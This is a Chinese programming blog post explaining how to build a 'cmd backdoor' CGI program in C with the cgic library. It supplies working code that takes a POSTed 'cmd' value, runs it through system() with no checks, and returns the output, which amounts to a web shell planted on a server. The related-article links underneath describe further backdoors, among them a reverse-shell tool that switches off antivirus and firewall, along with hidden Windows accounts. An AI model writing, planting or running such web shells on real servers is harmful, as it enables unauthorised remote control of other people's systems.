C语言,后门程序,C语言CGI编程二 - 编写cmd后门

最新推荐文章于 2023-06-20 19:58:01 发布
最新推荐文章于 2023-06-20 19:58:01 发布
阅读量500 收藏
点赞数
文章标签: C语言 后门程序

里面该说的都说的很清楚。今天我们来用它来做一个后门,将后门放在有执行cgi权限的服务器上,通过客户端POST命令到cgi上并执行,达到控制服务器的目的。

首先下载官网上的压缩包。解压里面有cgic.c和cgic.h,这是我们需要用到的文件。(另外两个c文件是演示用的,还有一个makefile是linux下使用的,在VS2010中我没有用到它)

从官方的文档和下载的cgictest.c可以看到,这个库里有main函数。因为一个程序只能有一个入口点函数,所以我们不能再定义main函数。这里,我们新建一个工程,将上面说的cgic.c和cgic.h拷贝到工程目录下,最好把cgic.c改成cgic.cpp,这样我们就能用C++的语法来写程序了。

再在工程中添加一个cgiMain.cpp的文件,我们将代码写在其中。我们这个程序只用写一个函数,cgiMain,再包含ccgi库的头文件就行了。

cgiMain我们尽可以把它想象成main函数,只不过名字不一样罢了,我们把自己的代码写进去。执行的时候也和main完全一样,以return 0;退出。

我的这个cmd后门的代码如下:

int cgiMain()

{

cgiHeaderContentType("text/html");

char szPost[256];

cgiFormString("cmd",szPost,sizeof(szPost));

string strRe,strComm = szPost;

strComm += ">01.tmp";

system(strComm.c_str());

ifstream file("01.tmp",ios::in);

while (getline(file,strRe))

{

cout<";

}

file.close();

remove("01.tmp");

return 0;

}

比较简陋,只是来演示一下cgic库的使用。

cgiHeaderContentType是输出html文件的头。我上一篇文章讲了在cgi需要输出内容时,需要先输出"Content-type:text/html\n\n",这个函数就是起到这个作用。大家看源代码也可以看到。

cgiFormString("cmd",szPost,sizeof(szPost));这个函数很重要。众所周知,POST或GET到的字符串是这样一个格式:a=xxxxxx&b=yyyyyy&c=112233。我们这个函数,就是获得每一个索引对应的值。

第一个参数是索引的名字,第二个参数是保存获取到的值的字符串,第三个值是字符串大小。比如我们获取到的是cmd=ipconfig,则通过索引“cmd”就能获取到值ipconfig。

原则上来说,获取到了值,也就是命令的内容“ipconfig”,我们就可以执行了。但是我用的system函数不能返回执行结果。所以我换个方式,将执行的结果放入一个临时文件,然后从文件中获取到执行结果并删除文件。这也就是我后面的代码做的工作。都是CPP的内容我就不细讲了,文件操作也可以使用C语言中的fopen、fgets,效果相同。

提一下,如果要把一个命令的输出内容放入文件,直接在命令后面加">xx.txt"就行,就输出到了xx.txt文件中(绝对路径也行)。

ccgi是一个优秀的C语言CGI库,英语不好的同学可以结合我附件中的doc,里面有各个函数的中文介绍,包括设置cookie、上传文件等等功能。所以说很强大。

演示一下效果:

在本地html(本地客户端请大家自己思考着自己写)中输入命令:

1167d99bad0e82a514b644f1e467d15e.png

点击提交后返回结果:

a7410059283f65bec42f2791b34aca9a.png

weixin_39726044
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
who-openport:用纯C语言编写后门解体程序。此项目已经存在,并且正在运行中!
05-14
谁开放端口(wopnt) @Copyrights mrx6s0-2017-github.com/mrx6s0 经典[反向]后门,用纯C语言编写。 开发中。 加入这个项目, 联络我! @malw 是东西; 经典反向后门,用C语言编写。 正在开发中。 “谁打开了门?” 该代码旨在包括一种通过仅在计算机上安装一次程序来远程访问系统的方法。 一旦确保访问权限,服务器将能够在计算机上执行任意功能,并更改系统。 一旦执行,该程序即结束,也就是说,它像任何进程一样隐藏自己,作为守护程序运行,并维护与服务器的连接。 为此,shell实现必须连接到服务器。 不只是外壳,是的。 反向外壳的REMOTE。 与其他开放源代码后门不同,此操​​作(允许)即使在客户端(后门)关闭后也存在。 我正在逐步实施。 欢迎提供帮助。 用C语言开发后门写入 职能: (#)禁用防病毒 (#)禁用防火墙 (#
C语言构建WEB管理系统):了解CGI
程序猿的挨踢人生
03-16 4212
并非所有的网站页面静态的,大多数时候我们需要浏览器和服务器进行一个交互,比如在我们按下了页面的提交按钮后,表单数据被发送给了服务器,这个时候服务器端需要一个程序对表单数据进行处理,比如在登陆界面输入用户名和密码后按登录按钮时。这个时候就需要web客户端和服务器进行交互了,而此时CGI就很重要了。         CGI是一个web服务器主机提供信息服务的标准接口,全称是通用网关接口(Common
c语言后门,C语言做的后门【反连】
weixin_35917998的博客
05-19 247
该楼层疑似违规已被系统折叠隐藏此楼查看此楼/*Protocol of connectionConnect : CONNConnected Success : SUCCReboot : REBT 暂时不可用Upload : UPLDDownload : DNLDDestroy : DTOY 暂时不可用Help : HELP 暂时不可用OK : START TO TRANSFER ...
linux 下cgi控制机器重启
荒野无灯csdn weblog
09-24 1440
#include #include #include int main(int argc,char **argv) { printf("Content-type: text/html; charset=utf-8/n/n"); printf("The system is goging to reboot ......./n"); fflush(stdout); sync(); reboot(RB_AUTOBOOT); return 0; }
cgi web 调用多次启动_用C语言制作Web服务器
weixin_39686230的博客
11-28 170
本文,我们将使用C语言从零开始实现一个支持静态、动态网页的Web服务器。我们把这个服务器叫做Tiny。背景知识Web服务器使用HTTP协议与客户端(即浏览器)通信,而HTTP协议又基于TCP/IP协议。因此我们要做的工作就是利用Linux系统提供的TCP通信接口来实现HTTP协议。而Linux为我们提供了哪些网络编程接口呢?没错,就是socket(套接字),我们会在后面详细介绍该接口的使用方式。另...
商业编程-源码-C语言实例程序.zip
06-21
"商业编程-源码-C语言实例程序.zip" 文件集合显然旨在帮助学习者或开发者理解如何在商业环境中运用C语言编写高效、可靠的代码。下面我们将深入探讨C语言的一些关键知识点,以及它们在商业编程中的应用。 1. **基本...
商业编程-源码-计算机C语言上机编程.zip
06-23
3. **函数库**:可能包含常用的C语言函数模板,供学习者在编写程序时快速调用,提高编程效率。 4. **测试框架**:为每个练习或案例提供自动化的测试脚本,方便学习者检查代码的正确性。 5. **教程文档**:详细讲解...
c语言编写网页WEB-CGI技术教程
11-24
【描述】:“用c语言编写网页WEB-CGI技术教程”涉及到的是如何利用C语言来创建Web-CGI(Common Gateway Interface,通用网关接口)程序,从而实现动态网页的生成。CGI是一种标准,允许Web服务器与外部应用程序交互,...
商业源码-编程源码-c语言数值计算程序大全.zip
06-14
商业源码-编程源码-c语言数值计算程序大全.zip
C语言程序与设计教程(第5版)编程题-第
最新发布
08-01
源代码
windows创建隐藏用户及后门
diaobusi的博客
06-20 2278
在Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
简单的cmd双管道后门
qq_42124567的博客
05-16 979
这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd双管道后门。主要涉及到了socket通信和管道。 后门分为主动连接型和反向连接型,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。 双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
使用管道实现简单的CMD后门程序,并转化为Shellcode
Birldlee的博客
12-26 2755
实现一个能实现远程控制功能的shellcode,控制被攻击的主机。
黑客编程入门 之 后门编写初探
Steve·Curcy
09-05 1369
后门编写初探基本的执行DOS命令木马所需函数代码实现零管道木马和反弹木马零管道反弹木马木马功能的增强和扩展模块打造初步后门cmd shell 的自由切换模板 = 木马普通木马的自启动启动文件夹注册表启动其他 基本的执行DOS命令木马   我们现在先考虑最早的木马:将目标主机作为服务器,打开一个端口进行监听,攻击者就可以通过telnet进行连接。   DOS功能是木马必须拥有的最小的功能模块。那么我们现在的任务就是:1. 开创 cmd.exe 进程;2. 把 cmd 进程和客户的输入连起来。那么接下来介绍一下
cmd后门
smwhotjay的专栏
01-14 1006
// door.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include "stdafx.h" #include #pragma comment(lib,"Ws2_32") void door(); int main(int argc, char* argv[]) { door(); return 0; }
终极版C语言(十六)
03-21
整个教程以 C++ 语言为核心,完整精彩的演练了数据结构、算法、设计模式、数据库、大数据高并发检索、文件重定向、多线程同步、进程通讯、黑客劫持技术、网络安全、加密解密,以及各种精彩的小项目等,非常适合大家学习。讲课生动风趣、深入浅出,全套视频内容充实。
C语言,后门程序,c语言windows后门
weixin_31741271的博客
05-18 274
c语言windows后门在WINDOWS服务器渗透的时候可能用的着,也可以让xx界里的朋友学点东西功能在帐户有组策略限制的时候,无法添加管理员账号的时候,可以不用密码登陆。测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。// get.cpp : 定义控制台应用程序的入口点。//#include "stdio.h"#include #include BOOL E...
后门的类型与kali生成后门如何实现,及如何使用
2301_77441874的博客
06-19 1544
小小的讲一下后门程序以及kali如何进行后门的生成以及调用。
C语言程序设计课后习题1-8参考答案.doc
11-15
通过解答这些习题,学生可以巩固计算机系统的基础概念,这对于理解和编写C语言程序至关重要。C语言是一种底层语言,直接与硬件交互,理解这些基础知识有助于更好地掌握C语言编程技巧。同时,解决课后习题也能帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值